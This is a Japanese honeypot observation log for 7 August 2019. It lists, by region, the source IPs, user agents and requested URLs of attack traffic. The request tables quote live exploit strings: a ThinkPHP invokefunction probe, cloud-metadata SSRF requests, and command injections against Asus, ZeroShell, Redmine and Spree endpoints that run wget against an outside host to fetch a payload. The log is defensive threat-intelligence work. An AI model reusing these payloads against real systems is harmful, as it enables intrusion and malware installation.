ハニーポット(仮) 観測記録 2019/08/07分です。
まとめ
Region:AP
ThinkPHPの脆弱性を狙うアクセス
Jira(CVE-2019–11581)の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Jorgeeでのスキャン行為
ZmEuでのスキャン行為
112[.]124[.]42[.]80に関する不正通信
を確認しました。
UserAgentがAWS Security Scannerの通信を確認しました。
Region:US
Asus RT56Uルータ(CVE-2013-5948)の脆弱性を狙うアクセス
Jira(CVE-2019–11581)の脆弱性を狙うアクセス
Redmine SCM Repositoryの脆弱性を狙うアクセス
Spree Commerce(OSS eコマースソフト)の脆弱性を狙うアクセス
ZeroShell/Linix(CVE-2009-0545)の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuでのスキャン行為
112[.]124[.]42[.]80に関する不正通信
123[.]125[.]114[.]144に関する不正通信
を確認しました。
Region:EU
Jira(CVE-2019–11581)の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuでのスキャン行為
3[.]9[.]135[.]182に関する不正通信
112[.]124[.]42[.]80に関する不正通信
を確認しました。
UserAgentがAWS Security Scannerの通信を確認しました。
他
AWS環境へのスキャンが実施されている可能性があります。
アクセス数推移
AP:総アクセス数:143 (前日比:+18)
US:総アクセス数:28 (前日比:+8)
EU:総アクセス数:40 (前日比:-3)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 113.125.44.65 | China |
2 | 114.115.181.47 | China |
1 | 123.57.242.94 | China |
2 | 128.14.133.58 | United States |
1 | 157.55.39.37 | United States |
1 | 165.22.28.110 | United States |
1 | 169.197.108.6 | Netherlands |
10 | 175.182.75.161 | Taiwan |
2 | 182.16.103.93 | Hong Kong |
6 | 195.154.86.34 | France |
1 | 198.108.67.112 | United States |
9 | 198.177.123.196 | United States |
5 | 2.224.132.78 | Italy |
1 | 39.106.227.80 | China |
2 | 45.252.248.236 | Vietnam |
2 | 5.188.210.101 | Russia |
20 | 52.25.147.204 | United States |
1 | 52.35.37.229 | United States |
3 | 54.255.201.28 | Singapore |
38 | 60.12.172.21 | China |
3 | 60.191.52.254 | China |
1 | 64.121.155.96 | United States |
9 | 69.255.234.170 | United States |
4 | 71.6.146.185 | United States |
9 | 80.195.148.174 | United Kingdom |
4 | 82.221.105.6 | Iceland |
1 | 89.248.174.52 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
15 | AWS Security Scanner |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
4 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
33 | Mozilla/5.0 Jorgee |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
2 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
5 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | python-requests/2.10.0 |
1 | python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2 |
42 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | GET | /db/ | HTTP/1.1 |
2 | GET | /echo.php | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | HTTP/1.1 | |
1 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
1 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | http://example.com/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
10 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
4 | GET | /manager/html | HTTP/1.1 |
6 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
6 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /ncsi.txt | HTTP/1.1 |
6 | GET | /phpmyadmin/ | HTTP/1.1 |
3 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
8 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
6 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /pma/ | HTTP/1.1 |
3 | GET | /PMA/ | HTTP/1.1 |
8 | GET | /pma/scripts/setup.php | HTTP/1.1 |
3 | GET | /robots.txt | HTTP/1.1 |
3 | GET | /secure/ContactAdministrators!default.jspa | HTTP/1.1 |
2 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
8 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
2 | GET | /.well-known/security.txt | HTTP/1.1 |
3 | HEAD | /dbadmin/ | HTTP/1.1 |
3 | HEAD | /db/ | HTTP/1.1 |
3 | HEAD | / | HTTP/1.1 |
1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | HEAD | /images/ | HTTP/1.1 |
6 | HEAD | /phpmyadmin/ | HTTP/1.1 |
3 | HEAD | /pma/ | HTTP/1.1 |
3 | HEAD | /PMA/ | HTTP/1.1 |
1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
6 | \x16\x03\x01 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 111.224.249.151 | China |
1 | 123.145.17.95 | China |
1 | 123.158.48.119 | China |
1 | 124.235.138.168 | China |
1 | 124.235.138.41 | China |
1 | 124.235.138.62 | China |
1 | 169.197.108.38 | Netherlands |
1 | 182.200.7.114 | China |
3 | 195.154.86.34 | France |
1 | 198.108.67.112 | United States |
1 | 213.128.88.99 | Turkey |
1 | 218.58.38.222 | China |
1 | 27.224.137.60 | China |
2 | 46.105.234.11 | France |
2 | 47.95.224.246 | China |
1 | 52.35.37.229 | United States |
2 | 5.39.37.10 | France |
1 | 54.255.201.28 | Singapore |
1 | 54.39.209.227 | Canada |
1 | 58.248.202.31 | China |
1 | 60.191.52.254 | China |
1 | 60.208.165.146 | China |
1 | 89.248.174.52 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
1 | Mozilla/5.0 |
1 | Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36 |
3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
3 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2 |
3 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
1 | GET | /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192[.]168[.]1[.]1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | http://boxun.com/ | HTTP/1.1 |
1 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]epochtimes[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]ip[.]cn/ | HTTP/1.1 |
1 | GET | http://www[.]minghui[.]org/ | HTTP/1.1 |
1 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /repository/annotate?rev=wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | /?search[send]=eval&search[send][]=Kernel.fork%20do%60wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | /secure/ContactAdministrators!default.jspa | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
1 | POST | /cgi-bin/;wget http://185[.]164[.]72[.]155/richard; | |
1 | PROPFIND | / | HTTP/1.1 |
1 | \x16\x03\x01 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 128.14.133.58 | United States |
3 | 195.154.86.34 | France |
1 | 213.128.88.99 | Turkey |
17 | 52.25.147.204 | United States |
1 | 54.255.201.28 | Singapore |
1 | 60.191.52.254 | China |
16 | 79.11.97.105 | Italy |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
7 | AWS Security Scanner |
2 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
3 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
5 | CONNECT | 3[.]9[.]135[.]182:80 | HTTP/1.0 |
1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
1 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | http://example.com/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /secure/ContactAdministrators!default.jspa | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
5 | \x16\x03\x01 |